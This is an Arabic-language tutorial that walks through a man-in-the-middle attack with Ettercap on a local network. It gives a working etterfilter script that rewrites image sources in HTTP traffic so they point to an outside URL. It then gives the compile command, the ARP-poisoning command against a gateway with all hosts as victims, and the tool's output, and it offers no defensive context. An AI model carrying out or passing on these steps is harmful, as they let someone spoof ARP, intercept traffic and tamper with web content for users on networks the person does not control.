السلام عليكم ورحمه الله وبركاته
نبذه عن Ettercap :-
هذه الاداه هي اداه لعمل هجوم man in the middle على شبكه ال LAN ويعمل ايضا على انه Sniff على شبكه شغاله ( live ) ويتمتع بأنه يقبل بعض ال filters الخاصه فيه لعمل خواص قد تقوم انت بأضافتها او قد تجدها جاهزه في الانترنت ...
موقع البرنامج : http://ettercap.sf.net
------------------------------------------------------------------------------------------------------------
اليوم سوف نقوم بأنشاء Filter يقوم بعمليه جميله على الشبكه وهذا هو الفلتر
if (ip.proto == TCP && tcp.src == 80) {
replace("src=", "src=\"http://www.anything.com/fun.png\" ");
replace("SRC=", "src=\"http://www.anything.com/fun.png\" ");
msg("Filter Ran.\n");
}هاذا السكربت سوف يقوم بلنظر الى بروتوكول TCP وخاصه في البورت رقم 80 وتغيير طلبات التي تعبر عن طريق ال switch او عن طريق شبكه بردج .. ومال الى ذالك فيغير الطلب src= الى الطلب الذي وضعناه نحن ... فهاذا سيسبب في تغيير اي شئ يستعمل ال src= في طلباته الى شئ قريب من هاذا
<img src="http://www.anything.com/fun.png">
وسوف تضهر للمستخدمين على الشبكه هذه الصوره

فلنبدء بتوضيح طريقه العمل ... في البدايه قم بانشاء ملف للفلتر واكتب فيه السورس كود ..
ولنفرض انه fun.filter ومن ثم نقوم بتشغيل الكومبايلر الخاص ب ettercap ونعمل ملف باينري
root@Qnix:~/fun-with-ettercap# etterfilter fun.filter -o fun etterfilter NG-0.7.3 copyright 2001-2004 ALoR & NaGA 12 protocol tables loaded: DECODED DATA udp tcp gre icmp ip arp wifi fddi tr eth 11 constants loaded: VRRP OSPF GRE UDP TCP ICMP6 ICMP PPTP PPPoE IP ARP Parsing source file 'fun.filter' done. Unfolding the meta-tree done. Converting labels to real offsets done. Writing output to 'fun' done. -> Script encoded into 8 instructions
الاّن قمنا بأنشاء filter جاهز للعمل واسمه fun ... نقوم بتشغيله وتشغيل برنامج ettercap والعمل على
تطبيق هاذا الفلتر على الشبكه التي توجد في المنزل ..
root@Qnix:~/fun-with-ettercap# ettercap -T -q -F fun -M ARP /192.168.0.1/ // ettercap NG-0.7.3 copyright 2001-2004 ALoR & NaGA Content filters loaded from fun... Listening on eth0... (Ethernet) eth0 -> 00:0B:CD:7B:00:AA 192.168.0.81 255.255.255.0 SSL dissection needs a valid 'redir_command_on' script in the etter.conf file Privileges dropped to UID 65534 GID 65534... 29 plugins 39 protocol dissectors 53 ports monitored 7587 mac vendor fingerprint 1698 tcp OS fingerprint 2183 known services Randomizing *** hosts for scanning... Scanning the whole netmask for *** hosts... * |==================================================>| 100.00 % 3 hosts added to the hosts list... ARP poisoning victims: GROUP 1 : 192.168.0.1 00:04:56:B8:70:AD GROUP 2 : ANY (all the hosts in the list) Starting Unified sniffing... Text only Interface activated... Hit 'h' for inline help Filter Ran. Filter Ran.
كما ترون قد استعملنا الامر ettercap -T -q -F fun -M ARP /192.168.0.1/ //
-T = لاستعمال ال text mode لكي يعنل عن طريق ال console
-q = وهو لعرض الاشياء المهمه فقط
-F= لأضافه فلتر جديد وقد اضفنا fun
-M = لتشغيل هجوم MITM ( رجل في المنتصف )
ARP = النوع المتختار للباكتس ( الهجوم )
// // = هنا تحدد الايبيات واذا وضعت فقط // // فسوف يقوم بلبحث في المجال كله ( netmask )
وها قد قمنا بانهاء العمل ... فعندما يقوم الجهاز الفلاني صاحب ال ip رقم 192.168.0.1 بلدخول الى موقع
او اي شئ ... سوف تضهر له صور كثيره من الموجوده في الأعلى ...
( كاتب السكربت : NaGa & ALoR )
تحياتي